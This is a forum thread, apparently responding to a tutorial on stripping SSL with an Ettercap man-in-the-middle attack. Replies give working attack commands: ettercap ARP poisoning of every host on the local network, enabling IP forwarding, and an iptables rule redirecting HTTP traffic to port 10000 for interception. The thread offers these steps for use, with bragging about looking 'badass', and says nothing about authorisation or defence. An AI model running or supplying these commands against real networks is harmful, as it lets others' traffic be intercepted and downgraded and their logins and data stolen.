Jump to content

Strip Ssl Via Ettercap Man In The Middle Attack


miT

Recommended Posts

for those prefer the command line (looks more badass);

ettercap -T -q -i <interface> -P auto -M arp // //

I find it's also nice to save my iptables for future use, cuts down on typing;

sudo iptables-save <filename>
sudo iptables-restore <filename>

Edited by sablefoxx
Link to comment
Share on other sites

for those prefer the command line (looks more badass);

ettercap -T -q -i <interface> -P auto -M arp // //

I find it's also nice to save my iptables for future use, cuts down on typing;

sudo iptables-save <filename>
sudo iptables-restore <filename>

---

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Link to comment
Share on other sites

  • 2 weeks later...
for those prefer the command line (looks more badass);

ettercap -T -q -i <interface> -P auto -M arp // //

I find it's also nice to save my iptables for future use, cuts down on typing;

sudo iptables-save <filename>
sudo iptables-restore <filename>

I almost always prefer the terminal over anything (see my videos) but Ettercap has a really useful GUI. Not only is it easier and faster to manage my hosts/targets with, it's also has a pretty sweet interface. Why pass that up? :)

---

echo 1 > /proc/sys/net/ipv4/ip_forward

Covered that in step 6 ...

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

... annnd step 8

Edited by miT
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...